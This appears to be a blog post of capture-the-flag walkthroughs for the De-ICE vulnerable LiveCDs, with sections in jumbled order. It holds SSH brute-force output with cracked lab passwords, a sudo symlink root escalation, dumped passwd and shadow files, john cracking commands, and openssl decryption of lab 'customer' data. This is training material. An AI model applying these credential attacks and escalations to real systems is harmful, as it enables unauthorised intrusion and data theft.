[+] 192.168.1.120:22 SSH - Success: 'jbresnahan:blahblah' 'uid=1002(jbresnahan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 24 opened (192.168.1.130:44168 -> 192.168.1.120:22) at 2015-01-08 12:30:10 -0700
[+] 192.168.1.120:22 SSH - Success: 'jduff:princess' 'uid=1020(jduff) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 25 opened (192.168.1.130:45406 -> 192.168.1.120:22) at 2015-01-08 12:30:14 -0700
[+] 192.168.1.120:22 SSH - Success: 'jfranklin:654321' 'uid=1027(jfranklin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 26 opened (192.168.1.130:42125 -> 192.168.1.120:22) at 2015-01-08 12:30:17 -0700
[+] 192.168.1.120:22 SSH - Success: 'kclemons:passw0rd' 'uid=1009(kclemons) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 27 opened (192.168.1.130:50416 -> 192.168.1.120:22) at 2015-01-08 12:30:20 -0700
[+] 192.168.1.120:22 SSH - Success: 'krenfro:master' 'uid=1048(krenfro) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 28 opened (192.168.1.130:51770 -> 192.168.1.120:22) at 2015-01-08 12:30:24 -0700
[+] 192.168.1.120:22 SSH - Success: 'ktso:1234' 'uid=1005(ktso) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 29 opened (192.168.1.130:41473 -> 192.168.1.120:22) at 2015-01-08 12:30:27 -0700
[+] 192.168.1.120:22 SSH - Success: 'kwebber:dragon' 'uid=1016(kwebber) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 30 opened (192.168.1.130:38814 -> 192.168.1.120:22) at 2015-01-08 12:30:30 -0700
[+] 192.168.1.120:22 SSH - Success: 'lmartinez:pepper' 'uid=1034(lmartinez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 31 opened (192.168.1.130:51877 -> 192.168.1.120:22) at 2015-01-08 12:30:34 -0700
[+] 192.168.1.120:22 SSH - Success: 'lmorales:football' 'uid=1028(lmorales) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 32 opened (192.168.1.130:54770 -> 192.168.1.120:22) at 2015-01-08 12:30:37 -0700
[+] 192.168.1.120:22 SSH - Success: 'mbryan:jennifer' 'uid=1042(mbryan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 33 opened (192.168.1.130:45205 -> 192.168.1.120:22) at 2015-01-08 12:30:40 -0700
[+] 192.168.1.120:22 SSH - Success: 'mholland:jordan' 'uid=1041(mholland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 34 opened (192.168.1.130:38046 -> 192.168.1.120:22) at 2015-01-08 12:30:43 -0700
[+] 192.168.1.120:22 SSH - Success: 'mnader:welcome' 'uid=1047(mnader) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 35 opened (192.168.1.130:60899 -> 192.168.1.120:22) at 2015-01-08 12:30:47 -0700
[+] 192.168.1.120:22 SSH - Success: 'mrodriguez:qwerty' 'uid=1026(mrodriguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 36 opened (192.168.1.130:51135 -> 192.168.1.120:22) at 2015-01-08 12:30:50 -0700
[+] 192.168.1.120:22 SSH - Success: 'qpowers:michael' 'uid=1001(qpowers) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 37 opened (192.168.1.130:35915 -> 192.168.1.120:22) at 2015-01-08 12:30:53 -0700
[+] 192.168.1.120:22 SSH - Success: 'rdominguez:12345' 'uid=1010(rdominguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 38 opened (192.168.1.130:53430 -> 192.168.1.120:22) at 2015-01-08 12:30:56 -0700
[+] 192.168.1.120:22 SSH - Success: 'rjacobson:111111' 'uid=1043(rjacobson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 39 opened (192.168.1.130:34041 -> 192.168.1.120:22) at 2015-01-08 12:31:00 -0700
[+] 192.168.1.120:22 SSH - Success: 'rpatel:1234567' 'uid=1045(rpatel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 40 opened (192.168.1.130:34844 -> 192.168.1.120:22) at 2015-01-08 12:31:03 -0700
[+] 192.168.1.120:22 SSH - Success: 'sgains:computer' 'uid=1019(sgains) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 41 opened (192.168.1.130:54407 -> 192.168.1.120:22) at 2015-01-08 12:31:06 -0700
[+] 192.168.1.120:22 SSH - Success: 'sjohnson:12345678' 'uid=1046(sjohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 42 opened (192.168.1.130:40759 -> 192.168.1.120:22) at 2015-01-08 12:31:09 -0700
[+] 192.168.1.120:22 SSH - Success: 'strammel:monkey' 'uid=1006(strammel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 43 opened (192.168.1.130:55731 -> 192.168.1.120:22) at 2015-01-08 12:31:12 -0700
[+] 192.168.1.120:22 SSH - Success: 'swarren:Password' 'uid=1007(swarren) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 44 opened (192.168.1.130:52038 -> 192.168.1.120:22) at 2015-01-08 12:31:16 -0700
[+] 192.168.1.120:22 SSH - Success: 'tdeleon:soccer' 'uid=1038(tdeleon) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 45 opened (192.168.1.130:48251 -> 192.168.1.120:22) at 2015-01-08 12:31:19 -0700
[+] 192.168.1.120:22 SSH - Success: 'tgoodchap:nintendo' 'uid=1030(tgoodchap) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 46 opened (192.168.1.130:36430 -> 192.168.1.120:22) at 2015-01-08 12:31:22 -0700
[-] 192.168.1.120:22 SSH - Failed: ':'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I haven’t cracked root yet but notice this “‘ccoffee:0’ ‘uid=1044(ccoffee) gid=100(users) groups=100(users),102(admin)”. the 102 admin group id is promising.

Linux 2.6.27.27.
ccoffee@slax:~$ ls
DONOTFORGET*  scripts/
ccoffee@slax:~$ cat DONOTFORGET 
remember your 20th anniversary on the 5th!!!!!!!!!1111!!
ccoffee@slax:~$ cd scripts/
ccoffee@slax:~/scripts$ ls
getlogs.sh*
ccoffee@slax:~/scripts$ cat getlogs.sh 
cat: getlogs.sh: Permission denied
ccoffee@slax:~/scripts$

Permission denied!

ccoffee@slax:~$ mv scripts/ scripts.old
ccoffee@slax:~$ mkdir scripts     
ccoffee@slax:~$ ln -s /bin/sh scripts/getlogs.sh
ccoffee@slax:~$ ls -l scripts/getlogs.sh 
lrwxrwxrwx 1 ccoffee users 7 Jan  7 23:03 scripts/getlogs.sh -> /bin/sh*
ccoffee@slax:~$ sudo scripts/getlogs.sh

What this did was move the old script folder that I didn’t have permissions to into the .old folder. The new getlogs.sh folder is linked to the shell command so doing sudo getlogs.sh creates a root shell.

There is no specific challenge so once you are on the system look around and be awesome.

root@slax:/etc# cat passwd      
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
aard:x:1000:100:Aaron Ard:/home/aard:
qpowers:x:1001:100:Quinton Powers:/home/qpowers:
jbresnahan:x:1002:100:Jay Bresnahan:/home/jbresnahan:
aadams:x:1003:100:Adam Adams:/home/aadams:
jdavenport:x:1004:100:James Davenport:/home/jdavenport:
ktso:x:1005:100:Kristen Tso:/home/ktso:
strammel:x:1006:100:Stephanie Trammel:/home/strammel:
swarren:x:1007:100:Samuel Warren:/home/swarren:
myajima:x:1008:100:Moto Yajima:/home/myajima:
kclemons:x:1009:100:Kathryn Clemons:/home/kclemons:
rdominguez:x:1010:100:Rafael Dominguez:/home/rdominguez:
djohnson:x:1011:100:Daniel Johnson:/home/djohnson:
bbanter:x:1012:100:Bob Banter:/home/bbanter:
jalvarez:x:1013:100:Joy Alvarez:/home/jalvarez:
dgilfillan:x:1014:100:Darcy Gilfillan:/home/dgilfillan:
dgrant:x:1015:100:Daniel Grant:/home/dgrant:
kwebber:x:1016:100:Kathleen Webber:/home/kwebber:
aheflin:x:1017:100:Anna Heflin:/home/aheflin:
amaynard:x:1018:100:Arthur Maynard:/home/amaynard:
sgains:x:1019:100:Susan Gains:/home/sgains:
jduff:x:1020:100:Jerry Duff:/home/jduff:
hlovell:x:1021:100:Henrietta Lovell:/home/hlovell:
cchisholm:x:1022:100:Cindy Chisholm:/home/cchisholm:
dstevens:x:1023:100:Donald Stevens:/home/dstevens:
bphillips:x:1024:100:Brad Phillips:/home/bphillips:
dwestling:x:1025:100:David Westling:/home/dwestling:
mrodriguez:x:1026:100:Manuel Rodriguez:/home/mrodriguez:
jfranklin:x:1027:100:Johnny Franklin:/home/jfranklin:
lmorales:x:1028:100:Lindsey Morales:/home/lmorales:
jayala:x:1029:100:John Ayala:/home/jayala:
tgoodchap:x:1030:100:Taj Goodchap:/home/tgoodchap:
aallen:x:1031:100:Aaron Allen:/home/aallen:
aweiland:x:1032:100:Adam Weiland:/home/aweiland:
dtraylor:x:1033:100:Donnie Traylor:/home/dtraylor:
lmartinez:x:1034:100:Luis Martinez:/home/lmartinez:
aspears:x:1035:100:Adam Spears:/home/aspears:
dcooper:x:1036:100:Donald Cooper:/home/dcooper:
bwatkins:x:1037:100:Brandon Watkins:/home/bwatkins:
tdeleon:x:1038:100:Terrence Deleon:/home/tdeleon:
aharp:x:1039:100:Annie Harp:/home/aharp:
jalcantar:x:1040:100:Jesse Alcantar:/home/jalcantar:
mholland:x:1041:100:Marian Holland:/home/mholland:
mbryan:x:1042:100:Michael Bryan:/home/mbryan:
rjacobson:x:1043:100:Randy Jacobson:/home/rjacobson:
ccoffee:x:1044:100:Chad Coffee:/home/ccoffee:
rpatel:x:1045:100:Randall Patel:/home/rpatel:
sjohnson:x:1046:100:Steven Johnson:/home/sjohnson:
mnader:x:1047:100:Muhammad Nader:/home/mnader:
krenfro:x:1048:100:Kimberly Renfro:/home/krenfro:

root@slax:/etc# cat shadow
root:$1$6Hl/leIf$BHG4Z0HgNq2bnbRriQcCt/:16442:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
aard:$1$M/1naIfI$/dpCFIuWISrIGy408fP0U.:16442:0:99999:7:::
qpowers:$1$oDCsaIfI$PlHnGw5Ylqoke4HOfDnz81:16442:0:99999:7:::
jbresnahan:$1$nHExaIfI$xFPgXAOo9ktw2azn/qnbv.:16442:0:99999:7:::
aadams:$1$TzF0bIfI$RvB2GZOb5WDCJX.agChuB1:16442:0:99999:7:::
jdavenport:$1$3wl/neIf$kuBSySXsu5nSeNjMgBRjr1:16442:0:99999:7:::
ktso:$1$t0KAbIfI$WPULPwgsjByt0ICV6.zMS1:16442:0:99999:7:::
strammel:$1$lpLFbIfI$B9wU7zrHALtgO5PpTFEYJ1:16442:0:99999:7:::
swarren:$1$TdNKbIfI$Duy.Uy2sGwqY6YsfTzX4h1:16442:0:99999:7:::
myajima:$1$xJPPbIfI$SQc4btSCHeIIYPVE/.r6a.:16442:0:99999:7:::
kclemons:$1$IURUbIfI$Tpisuh39vd16hd9Q2W198/:16442:0:99999:7:::
rdominguez:$1$PDTZbIfI$xKK6A/ZQiFgWpYVzzd.Gw.:16442:0:99999:7:::
djohnson:$1$buUebIfI$0gd4dWKyVH2.ufk8zSq.z0:16442:0:99999:7:::
bbanter:$1$QWWjbIfI$GoRunRTIFvf9sOfrWttwS0:16442:0:99999:7:::
jalvarez:$1$AHYobIfI$gqSV2utxp46bVc0MzOFCP.:16442:0:99999:7:::
dgilfillan:$1$m0atbIfI$r5vprBT7DmEx/bNqH8RDM1:16442:0:99999:7:::
dgrant:$1$7sbybIfI$8FbpRfuY.N8hX6Sn4A4PX.:16442:0:99999:7:::
kwebber:$1$9hd1cIfI$Hsx2f74tHtVhioZegod8d.:16442:0:99999:7:::
aheflin:$1$waf6cIfI$Yq12oAcx/c176h1LC/MHJ.:16442:0:99999:7:::
amaynard:$1$nFhBcIfI$Q7LRuK3aMzhrdqZD1AjaF0:16442:0:99999:7:::
sgains:$1$U3jGcIfI$pbF6mepdppQgEM1/OnOKS1:16442:0:99999:7:::
jduff:$1$bskLcIfI$0xxI8JWghNZrwknfckK4I1:16442:0:99999:7:::
hlovell:$1$0bmQcIfI$f7yj5xtUFVmGnMtEc0F0M/:16442:0:99999:7:::
cchisholm:$1$2PoVcIfI$g2OHLIwZNfkSEwbkdXL.o/:16442:0:99999:7:::
dstevens:$1$/MqacIfI$YrH3QJethu7PXmEB5cDvB.:16442:0:99999:7:::
bphillips:$1$3BsfcIfI$AnYSJSkRMC5yvbTQIdHPN1:16442:0:99999:7:::
dwestling:$1$nvtkcIfI$WOkUDONlGepzNXM37hzDW1:16442:0:99999:7:::
mrodriguez:$1$LkvpcIfI$UYw1kRIkon2T3Kf/as.hD.:16442:0:99999:7:::
jfranklin:$1$8XxucIfI$5V78VV1YZVUaq2PyRbH82/:16442:0:99999:7:::
lmorales:$1$NOzzcIfI$xHUTPP/Myrqh8iBIF4sH00:16442:0:99999:7:::
jayala:$1$r5//2dIf$WGWmk2GfQETfIqPvnu5Eb.:16442:0:99999:7:::
tgoodchap:$1$Yo0/7dIf$jfLG8/Fv7873kFlascMdg1:16442:0:99999:7:::
aallen:$1$Zm2/CdIf$tonJrOosRTYbCzxTYcBrJ.:16442:0:99999:7:::
aweiland:$1$Jc4/HdIf$Iae3U0Lbu04YjxfO3t8f2/:16442:0:99999:7:::
dtraylor:$1$db6/MdIf$5Wtmc3YxBJkLE3TjSqwX91:16442:0:99999:7:::
lmartinez:$1$DH8/RdIf$vosY88nHAoqwPonN.tMBO1:16442:0:99999:7:::
aspears:$1$.5A/WdIf$lt4KE9Mt01qjJwH0q/TaA.:16442:0:99999:7:::
dcooper:$1$2pB/bdIf$9Bqi7D3JH7nO3YVuiKhfq.:16442:0:99999:7:::
bwatkins:$1$biD/gdIf$PqXD41GXwTEtNnNSNP7ve1:16442:0:99999:7:::
tdeleon:$1$VdF/ldIf$8VVkJorueLDB2XEdwRcvA/:16442:0:99999:7:::
aharp:$1$GjH/qdIf$SXBGXRgsaGwWst2EVA4OK.:16442:0:99999:7:::
jalcantar:$1$dXJ/vdIf$1kaaAoMN7832vQ.0h8idE1:16442:0:99999:7:::
mholland:$1$HZL/.eIf$y0VAQHlJuHxJ09uHYYXYV1:16442:0:99999:7:::
mbryan:$1$/kN/3eIf$b6lCYJUAEVi89QU501i/J.:16442:0:99999:7:::
rjacobson:$1$WuP/8eIf$mbawyIozTk2s4rMW6.ruA/:16442:0:99999:7:::
ccoffee:$1$8.S/DeIf$1FJ.To3iEN0LVosO0Xtzg/:16442:0:99999:7:::
rpatel:$1$c8U/IeIf$g91rGG1w6ulFOgRto6R.D/:16442:0:99999:7:::
sjohnson:$1$zoW/NeIf$I6x4GbMkhjKDps9B56Yrm0:16442:0:99999:7:::
mnader:$1$u5Z/SeIf$9qy9RwXoat1fLfbQMjvri.:16442:0:99999:7:::
krenfro:$1$Hwb/XeIf$626PVcnIxjUS6zrwWz40P.:16442:0:99999:7:::

unshadow 120passwd 120shadow > 120unshadow
john -rules -wordlist=/usr/share/wordlists/rockyou.txt 120unshadow

While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

SE-ICE S1.110

Scenario: The scenario for this LiveCD is that a CEO of a small company has tasked you to do more extensive penetration testing of systems within his company. The network administrator has reconfigured systems within his network to meet tougher security requirements and expects you to fail any further penetration attempts. This system is an FTP server used by the network administrator team to create/reload systems on the company intranet. No classified or sensitive information should reside on this server. Through discussion with the administrator, you found out that this server had been used in the past to maintain customer information, but has been sanitized (as opposed to re-built). Prove to the network administrator that proper system configuration is not the only thing critical in securing a server.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.110.iso

Default IP 192.168.1.110

Flags:
1. create list of open ports
2. create list of users for brute force
3. brute force password for one or more users on an open service
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: obtain customer credit card information

 

Spoilers and Walkthrough

Change IP – Depending on your configuration you may not need to do this. Log in as root, password is at bottom of page. This assumes that you are using VMWare NAT and XX is the third octet of range you are using.

   ifconfig eth0 192.168.XX.110/24
   route add default gw 192.168.XX.2

Port Scan the System –

   nmap -sV -T4 -O -oX /root/Desktop/deice110 192.168.42.110

Hitting it with a version scan to determine what is running. We are going to output the file as xml and practice using the metasploit database. You can run it all from inside nmap using the db_nmap command and then normal nmap switches but I’m showing you the import function.

   msfconsole
   workspace -a deice
   workspace deice

This creates a database named deice and sets it as the current working

   db_import /root/Desktop/deice110
   hosts

You should see the 110 address. WooHoo!

   services

There should be four ports open. Go check out the website because it has info you need.
adamsa@herot.net
banterb@herot.net
coffeec@herot.net

I love me some FTP, I really love anonymous FTP

   use auxiliary/scanner/ftp/anonymous

Use either use the command line to get access to ftp or filezilla.
I used filezilla and downloaded everything.
The download/etc/shadow seems promising
John can work with the shadow file without unshadowing it.

Running john against it:

   john -rules -wordlist=/usr/share/wordlists/rockyou.txt shadow

john returned a password but it didn’t work.

There is a passwd file in dowload/opt/cygwin/etc but no shadow file so moving along
What is the core file in download/etc?

   file core
   core: ELF 32-bit LSB core file Intel 80386....

Better Google that it is a linux core dump file…go read some on that we’ll wait.

   strings core

The end looks like a dump of a shadow file

   strings core > /root/desktop/deice/coredump

This gives us a working copy on the desktop. I copied out the info and split it at the usernames. If you look at the shadow file from the 100 disk for the normal format; second verse, same as the first.

   john -rules -wordlist=/usr/share/wordlists/rockyou.txt coreshadow

This gives us the following users root, bbanter. SSH to the system and get root.

   ssh to the box as bbanter
   ssh bbanter@192.168.42.110
   su -

From the 100 disk we know that .enc files are encrypted and we are looking for credit card data so why not try to find that again.

   cd /
   find -iname *.enc

That pukes back a lot of things but look at:

   /home/root/.save/customer_account.csv.enc

Jump back to the openssl decrypt if you need help:

   openssl list-cipher-commands
   openssl enc -aes-128-cbc-d -in /home/root/.save/customer_account.csv.enc -out customer_account.csv

WAIT NO JOY!
Lets go look at the /home/root/.save folder

   cd /home/root/.save
   ls

Look at the copy.sh script

   cat copy.sh

This is the script that encrypted the file, the pass is in the “file” section. Lets decrypt it now:

   openssl enc -d -aes-256-cbc -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
   cat customer_account.csv

BOOM you’re done. Openssl is a pain but now you’re a pro.

Account Information

root:Complexity
bbanter:Zymurgy

While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. The De-ICE S1.100 was the first capture the flag type challenge that I ever did. I think I got it from a 2600 Magazine, so it holds a special place in my heart. I would have actually done this initially using BackTrack or PHLAK; PHALK still has the best Tux logo of any distro, RIP PHALK. I lost my original notes so this one is brand new, instead of a few years old like the other versions will be. Have fun and hopefully these are helpful.

SE-ICE S1.100

Scenario: The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities. To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – a old system that only has a web-based list of the company’s contact information. The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.100.iso

Default IP 192.168.1.100

Flags:
1. Create list of open ports
2. Create a list of possible user names
3. Gain access to the file system
4. Elevate to root privileges
5. Discover root password
6. Find sensitive data on the operating system

Spoilers and Walkthrough

I usually start all assessments out with a port scan. This gives me at least an idea of where to start on a black box test. Since I am running this in a local VMWare environment speed isn’t an issue so -T5 it is. I also what to do OS detection and service enumeration so I’m using -A.

nmap -A -p 0-65535 -T5 192.168.1.100
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-05 20:59 EDT
Nmap scan report for caps-dh841pm1(192.168.1.100)
Host is up (0.00025s latency).
Not shown: 65528 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd (broken: could not bind listening IPv4 socket)
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
| ssh-hostkey: 
| 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_ 2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
|_sshv1: Server supports SSHv1
25/tcp open smtp Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.1.128], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: UNSELECT LOGIN-REFERRALS MAILBOX-REFERRALS LITERAL+ THREAD=REFERENCES NAMESPACE completed IDLE SASL-IR CAPABILITY OK AUTH=LOGINA0001 BINARY IMAP4REV1 STARTTLS MULTIAPPEND SCAN THREAD=ORDEREDSUBJECT SORT
443/tcp closed https
MAC Address: 00:0C:29:1F:C6:F0 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Hosts: slax.example.net, isr-l2g99xz1; OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms caps-dh841pm1 (192.168.1.100)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.09 seconds

To start out I always by looking for low hanging fruit. Since the FTP service looks to be broken, based on the Nmap scan results we will look at the Apache website listening on port 80. From the website there are ten possible users.

Marie Marymarym@herot.net
Pat Patrickpatrickp@herot.net
Terry Thompsonthompsont@herot.net
Ben Benedictbenedictb@herot.net
Erin Gennieggenniege@herot.net
Paul Michaelmichaelp@herot.net
Ester Longlonge@herot.net
Erin Gennieggenniege@herot.net
Paul Michaelmichaelp@herot.net
Ester Longlonge@herot.net
Adam Adamsadamsa@herot.net
Bob Banterbanterb@herot.net
Chad Coffeecoffeec@herot.net

This is where it helps to have either been a sys admin or worked at a few different companies. The two most common username conventions I have encountered are <first>.<last>, <first initial><last>. I’ve also had <employee ID>, <first><last initial>, and worst of all <first 4 of last><first 3 of first>. Because the email addresses are <last><first initial> we will use that and also add root to the list because we know it is a Slax Linux host.

root
Marie.Mary
Pat.Patrick
Terry.Thompson
Ben.Benedict
Erin.Gennieg
Paul.Michael
Ester.Long
Adam.Adams
Bob.Banter
Chad.Coffee
marym
patrickp
thompsont
benedictb
genniege
michaelp
longe
adamsa
banterb
coffeec
mmary
ppatrick
tthompson
bbenedict
egennieg
pmichael
elong
aadams
bbanter
ccoffee

I’ll use metasploit to do the initial check for weak SSH passwords. You can set your options differently this is just a simple test.

msfconsole
use auxiliary/scanner/ssh/ssh_login
set BLANK_PASSWORDS true
